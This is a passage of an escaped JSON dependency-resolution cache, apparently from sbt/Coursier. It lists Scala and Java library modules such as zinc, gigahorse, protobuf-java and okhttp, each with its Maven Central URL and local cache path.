:\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"task-system_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/task-system_2.12/1.3.8/task-system_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/task-system_2.12/1.3.8/task-system_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"main-settings_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"main-settings_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/main-settings_2.12/1.3.8/main-settings_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/main-settings_2.12/1.3.8/main-settings_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.eed3si9n\",\"name\":\"gigahorse-core_2.12\",\"revision\":\"0.5.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"gigahorse-core_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/eed3si9n/gigahorse-core_2.12/0.5.0/gigahorse-core_2.12-0.5.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/gigahorse-core_2.12/0.5.0/gigahorse-core_2.12-0.5.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/eed3si9n/gigahorse\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.google.protobuf\",\"name\":\"protobuf-java\",\"revision\":\"3.7.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"protobuf-java\",\"type\":\"bundle\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/google/protobuf/protobuf-java/3.7.0/protobuf-java-3.7.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/google/protobuf/protobuf-java/3.7.0/protobuf-java-3.7.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.eed3si9n\",\"name\":\"gigahorse-okhttp_2.12\",\"revision\":\"0.5.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"gigahorse-okhttp_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/eed3si9n/gigahorse-okhttp_2.12/0.5.0/gigahorse-okhttp_2.12-0.5.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/gigahorse-okhttp_2.12/0.5.0/gigahorse-okhttp_2.12-0.5.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/eed3si9n/gigahorse\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.maven\",\"name\":\"maven-plugin-api\",\"revision\":\"3.3.9\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"maven-plugin-api\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/maven/maven-plugin-api/3.3.9/maven-plugin-api-3.3.9.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-plugin-api/3.3.9/maven-plugin-api-3.3.9.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.eed3si9n\",\"name\":\"sjson-new-scalajson_2.12\",\"revision\":\"0.8.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"sjson-new-scalajson_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/eed3si9n/sjson-new-scalajson_2.12/0.8.3/sjson-new-scalajson_2.12-0.8.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/sjson-new-scalajson_2.12/0.8.3/sjson-new-scalajson_2.12-0.8.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/eed3si9n/sjson-new\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"util-relation_2.12\",\"revision\":\"1.3.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"util-relation_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/util-relation_2.12/1.3.3/util-relation_2.12-1.3.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-relation_2.12/1.3.3/util-relation_2.12-1.3.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/util\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-lang.modules\",\"name\":\"scala-xml_2.12\",\"revision\":\"1.2.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scala-xml_2.12\",\"type\":\"bundle\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-lang/modules/scala-xml_2.12/1.2.0/scala-xml_2.12-1.2.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/modules/scala-xml_2.12/1.2.0/scala-xml_2.12-1.2.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://www.scala-lang.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.spire-math\",\"name\":\"jawn-parser_2.12\",\"revision\":\"0.10.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"jawn-parser_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/spire-math/jawn-parser_2.12/0.10.4/jawn-parser_2.12-0.10.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/spire-math/jawn-parser_2.12/0.10.4/jawn-parser_2.12-0.10.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://github.com/non/jawn\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.ant\",\"name\":\"ant\",\"revision\":\"1.9.9\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"ant\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/ant/ant/1.9.9/ant-1.9.9.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/ant/ant/1.9.9/ant-1.9.9.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://ant.apache.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.maven\",\"name\":\"maven-artifact\",\"revision\":\"3.3.9\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[{\"organization\":\"org.apache.maven.wagon\",\"name\":\"wagon-provider-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}}],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"maven-artifact\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/maven/maven-artifact/3.3.9/maven-artifact-3.3.9.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-artifact/3.3.9/maven-artifact-3.3.9.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"zinc-classpath_2.12\",\"revision\":\"1.3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"zinc-classpath_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/zinc-classpath_2.12/1.3.4/zinc-classpath_2.12-1.3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-classpath_2.12/1.3.4/zinc-classpath_2.12-1.3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/zinc\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"zinc-core_2.12\",\"revision\":\"1.3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"zinc-core_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/zinc-core_2.12/1.3.4/zinc-core_2.12-1.3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-core_2.12/1.3.4/zinc-core_2.12-1.3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/zinc\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-lang\",\"name\":\"scala-compiler\",\"revision\":\"2.12.10\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scala-compiler\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/.sbt/boot/scala-2.12.10/lib/scala-compiler.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://www.scala-lang.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"net.java.dev.jna\",\"name\":\"jna\",\"revision\":\"4.5.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"jna\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/net/java/dev/jna/jna/4.5.0/jna-4.5.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/net/java/dev/jna/jna/4.5.0/jna-4.5.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/java-native-access/jna\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.lihaoyi\",\"name\":\"fastparse-utils_2.12\",\"revision\":\"0.4.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"fastparse-utils_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/lihaoyi/fastparse-utils_2.12/0.4.2/fastparse-utils_2.12-0.4.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/lihaoyi/fastparse-utils_2.12/0.4.2/fastparse-utils_2.12-0.4.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/lihaoyi/scala-parser\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.lmax\",\"name\":\"disruptor\",\"revision\":\"3.4.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"disruptor\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/lmax/disruptor/3.4.2/disruptor-3.4.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/lmax/disruptor/3.4.2/disruptor-3.4.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://lmax-exchange.github.com/disruptor\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"javax.inject\",\"name\":\"javax.inject\",\"revision\":\"1\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[{\"organization\":\"javax.el\",\"name\":\"el-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.ejb3\",\"name\":\"jboss-ejb3-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.interceptor\",\"name\":\"jboss-interceptor-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}}],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"javax.inject\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/javax/inject/javax.inject/1/javax.inject-1.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/inject/javax.inject/1/javax.inject-1.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://code.google.com/p/atinject/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"tasks_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"tasks_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/tasks_2.12/1.3.8/tasks_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/tasks_2.12/1.3.8/tasks_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.reactivestreams\",\"name\":\"reactive-streams\",\"revision\":\"1.0.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"reactive-streams\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/reactivestreams/reactive-streams/1.0.2/reactive-streams-1.0.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/reactivestreams/reactive-streams/1.0.2/reactive-streams-1.0.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://www.reactive-streams.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.slf4j\",\"name\":\"slf4j-api\",\"revision\":\"1.7.26\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"slf4j-api\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/slf4j/slf4j-api/1.7.26/slf4j-api-1.7.26.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/slf4j/slf4j-api/1.7.26/slf4j-api-1.7.26.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://www.slf4j.org\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.swoval\",\"name\":\"file-tree-views\",\"revision\":\"2.1.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"file-tree-views\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/swoval/file-tree-views/2.1.3/file-tree-views-2.1.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/swoval/file-tree-views/2.1.3/file-tree-views-2.1.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/swoval/swoval\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.squareup.okhttp3\",\"name\":\"okhttp\",\"revision\":\"3.14.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"okhttp\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/squareup/okhttp3/okhttp/3.14.2/okhttp-3.14.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/squareup/okhttp3/okhttp/3.14.2/okhttp-3.14.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.lihaoyi\",\"name\":\"sourcecode_2.12\",\"revision\":\"0.1.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"sourcecode_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/lihaoyi/sourcecode_2.12/0.1.3/sourcecode_2.12-0.1.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/lihaoyi/sourcecode_2.12/0.1.3/sourcecode_2.12-0.1.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/lihaoyi/sourcecode\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"javax.annotation\",\"name\":\"jsr250-api\",\"revision\":\"1.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[{\"organization\":\"javax.el\",\"name\":\"el-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.ejb3\",\"name\":\"jboss-ejb3-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.interceptor\",\"name\":\"jboss-interceptor-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}}],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"jsr250-api\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://jcp.org/aboutJava/communityprocess/final/jsr250/index.html\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.ow2.asm\",\"name\":\"asm-analysis\",\"revision\":\"7.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"asm-analysis\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/ow2/asm/asm-analysis/7.0/asm-analysis-7.0.jar\